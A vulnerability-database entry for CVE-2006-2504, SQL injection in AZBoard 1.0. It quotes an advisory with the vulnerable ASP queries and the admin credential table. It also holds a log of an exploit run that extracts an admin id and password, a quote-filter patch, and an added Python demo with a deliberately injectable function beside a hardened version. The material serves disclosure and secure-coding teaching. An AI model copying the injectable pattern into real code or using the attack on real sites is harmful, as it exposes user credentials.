AZBoard Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1194906    Vulnerability type: SQL injection
Published: 2006-05-22    Updated: 2006-05-22
CVE ID: CVE-2006-2504    CNNVD-ID: CNNVD-200605-421
Platform: N/A    CVSS score: 7.5
|Vulnerability Source
https://cxsecurity.com/issue/WLB-2006050122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-421
|Vulnerability Details
Multiple SQL injection vulnerabilities exist in monoAZBOARD 1.0 and earlier. A remote attacker can execute arbitrary SQL commands via the (1) search and (2) cate parameters of (a) list.asp, and via the (3) id and cate parameters of (b) admin_ok.asp.
|Vulnerability EXP
Title : Azboard <= 1.0 Multiple Sql Injections

Published : 2006.5.14

Author : x90c(정경주)@chollian.net/~jyj9782/

Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt

0x01 Summary

Azboard is a web board written in ASP (Active Server Pages).

It has a SQL injection hole, so we can get the board admin's id and password and so on. Let's start by looking at the code..

0x02 Codes

~/azboard/list.asp:

-
    ' search (a column name), searchstring and cate all come from the request
    ' and are pasted straight into the SQL text without escaping or binding.
    if searchstring<>"" then
        sql="select count(board_idx) from board where " & search & " like '%" & searchstring & "%' and cate='"&cate&"' "
    else
        sql="select count(board_idx) from board where cate='"&cate&"'"
    end if
-

The above lines are vulnerable to SQL attack, as you can see. y0! ;)~

~/azboard/admin_ok.asp:

-
' id and cate come from the request and are concatenated into the admin lookup.
SQL = "SELECT cate,admin_id,admin_pass,board_name FROM board_admin where admin_id='"&id&"' and cate='"&cate&"'"
-

I found the fields ('admin_id', 'admin_pass') and the table ('board_admin') in this file.

0x03 Exploit

[root@ebp exploits]# ls -al azboard_blue.c
-rw-r--r--    1 root     root         4771  5월 14 23:30 azboard_blue.c
[root@ebp exploits]# ls -al azboard_blue
-rwxr-xr-x    1 root     root        17163  5월 14 23:30 azboard_blue
[root@ebp exploits]#
[root@ebp exploits]# make azboard_blue
cc     azboard_blue.c   -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[root@ebp exploits]# ./azboard_blue
azaboard 1.0 <= 0day :
$ ./azboard_blue <azboard URL> <cate>
~ x90c (at) chollian (dot) net [email concealed]/~jyj9782
[root@ebp exploits]#
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[root@ebp exploits]#

0x04 Patch

~/azboard/list.asp:

..
' Reject a single quote in any of the three values concatenated into the query.
' (The original listing tested cate twice; searchstring is the evident intent.)
if instr(search, "'") > 0 or instr(searchstring, "'") > 0 or instr(cate, "'") > 0 then
    Response.redirect "error.asp"
end if
..
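As an added example (not AZBoard's code and not from the advisory), the list.asp count query from 0x02 is rebuilt in Python on an in-memory SQLite table: the concatenated form the advisory shows, a hardened form that whitelists the column name and binds the other values, and the single-quote test from the 0x04 patch. The column names `subject` and `writer`, the sample rows and the SQLite schema are assumptions; AZBoard's real schema is not on the page. The same binding applies to the admin_ok.asp lookup of `id` and `cate`.

```python
"""Added example: list.asp's count query rebuilt on SQLite, vulnerable and
hardened forms side by side.  Schema, columns and rows are constructed."""
import sqlite3

# Constructed sample data standing in for AZBoard's 'board' table.
SAMPLE_ROWS = [
    ("hello world", "alice", "testbbs"),
    ("hello again", "bob", "testbbs"),
    ("unrelated", "carol", "otherbbs"),
]

# Columns list.asp is allowed to search on (assumed; the page does not list them).
# The column name cannot be bound as a parameter, so it is whitelisted instead.
SEARCHABLE_COLUMNS = {"subject", "writer"}


def make_db():
    """Create the constructed board table in memory."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE board (board_idx INTEGER PRIMARY KEY, "
                "subject TEXT, writer TEXT, cate TEXT)")
    con.executemany("INSERT INTO board (subject, writer, cate) VALUES (?, ?, ?)",
                    SAMPLE_ROWS)
    return con


def count_vulnerable(con, search, searchstring, cate):
    """Mirror of list.asp: every value is pasted into the SQL text, so a quote
    in searchstring or cate, or anything in search, changes the statement's
    structure instead of being treated as data."""
    if searchstring != "":
        sql = ("select count(board_idx) from board where " + search + " like '%"
               + searchstring + "%' and cate='" + cate + "'")
    else:
        sql = "select count(board_idx) from board where cate='" + cate + "'"
    return con.execute(sql).fetchone()[0]


def count_hardened(con, search, searchstring, cate):
    """Column name checked against the whitelist; searchstring and cate are
    bound parameters, so a quote is just a character.  The '%' wildcards are
    added in Python rather than spliced into the SQL."""
    if searchstring != "":
        if search not in SEARCHABLE_COLUMNS:
            raise ValueError("search column not allowed: %r" % search)
        sql = "select count(board_idx) from board where %s like ? and cate=?" % search
        params = ("%" + searchstring + "%", cate)
    else:
        sql = "select count(board_idx) from board where cate=?"
        params = (cate,)
    return con.execute(sql, params).fetchone()[0]


def quote_filter_blocks(search, searchstring, cate):
    """The advisory's 0x04 patch: refuse any value containing a single quote.
    It covers the two quoted values but says nothing about the unquoted column
    name, which is why count_hardened also needs the whitelist."""
    return any("'" in v for v in (search, searchstring, cate))


def rejects(func, *args):
    """True if func raises: the concatenated query breaks on an apostrophe in
    the data, the hardened one refuses a column name outside the whitelist."""
    try:
        func(*args)
    except (ValueError, sqlite3.OperationalError):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(count_vulnerable(db, "subject", "hello", "testbbs"))  # 2
    print(count_hardened(db, "subject", "hello", "testbbs"))    # 2
    print(count_hardened(db, "subject", "it's", "testbbs"))     # 0: quote is data
    print(rejects(count_vulnerable, db, "subject", "it's", "testbbs"))  # True
    print(quote_filter_blocks("subject", "it's", "testbbs"))    # True
```

The point the patch section does not make explicit: `search` is a column name and is interpolated without quotes, so a filter that only looks for `'` does not constrain it; a fixed whitelist of column names is the control for that parameter, and bound parameters handle `searchstring`, `cate` and `id`.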

Thanks for many 0p3n-H4ck3rz!

- Blu3h4t Team.
|References

Source: BUGTRAQ
Name: 20060515 Azboard <= 1.0 Multiple Sql Injections
Link: http://www.securityfocus.com/archive/1/archive/1/434010/100/0/threaded
Source: MISC
Link: http://user.chol.com/~jyj9782/sec/azboard_advisory.txt
Source: XF
Name: azboard-list-adminok-sql-injection(26495)
Link: http://xforce.iss.net/xforce/xfdb/26495
Source: BID
Name: 17990
Link: http://www.securityfocus.com/bid/17990
Source: OSVDB
Name: 25528
Link: http://www.osvdb.org/25528
Source: OSVDB
Name: 25527
Link: http://www.osvdb.org/25527
Source: VUPEN
Name: ADV-2006-1827
Link: http://www.frsirt.com/english/advisories/2006/1827
Source: SREASON
Name: 928
Link: http://securityreason.com/securityalert/928
Source: SECUNIA
Name: 20112
Link: http://secunia.com/advisories/20112